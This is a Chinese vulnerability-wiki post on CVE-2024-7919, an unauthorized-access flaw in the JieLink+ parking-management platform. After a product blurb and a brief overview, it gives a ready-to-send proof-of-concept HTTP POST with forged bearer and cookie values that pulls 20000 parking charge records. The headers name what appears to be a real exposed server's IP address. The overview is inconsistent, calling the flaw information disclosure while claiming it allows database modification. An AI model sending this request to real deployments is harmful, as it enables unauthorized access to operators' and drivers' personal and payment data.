【原创】(CVE-2024-7919)安徽德顺智能科技有限公司 JIELINK+ INTELLIGENT TERMINAL OPERATION PLATROFM 未授权访问漏洞
当前为私密分享,无需登录即可查看。
时间 |
---|
2024-08-05 22:58:41 |
CVE-2024-7919
Created: 08/18/2024 09:19 PM
Updated: 08/19/2024 02:21 AM
Changes: 08/18/2024 09:19 PM (54), 08/19/2024 02:21 AM (18)
Submitter: sanbao@wiki
0x01 产品简介
捷顺JieLink+智能终端操作平台(JSOTC2016 fJeLink+)是捷顺历经多年行业经验积累,集智能硬件技术视频分析技术、互联网技术等多种技术融合,基于B/S架构,实现核心业务处理模型(用户中心、投权中心财务中心中心值班室、 运维中心车行客户端等)的搭建;基于C/S架构实现岗亭收费、收费、自助服务,满足车场收费车辆特征分析处理、当班管理、业务托管、信息上报等现场业务处理。
0x02 漏洞概述
JieLink+智能终端操作平台/report/ParkChargeRecord/GetDataList接口处存在敏感信息泄露漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失
0x02 POC
POST /report/ParkChargeRecord/GetDataList HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: Bearer test
Cookie: JSESSIONID=test;UUID=1; userid=admin
X-Requested-With: XMLHttpRequest
Content-Length: 21
Origin: http://111.53.90.115:8090
Connection: close
Referer: http://111.53.90.115:8090/Report/ParkOutRecord/Index
Sec-GPC: 1
Priority: u=1
page=1&rows=20000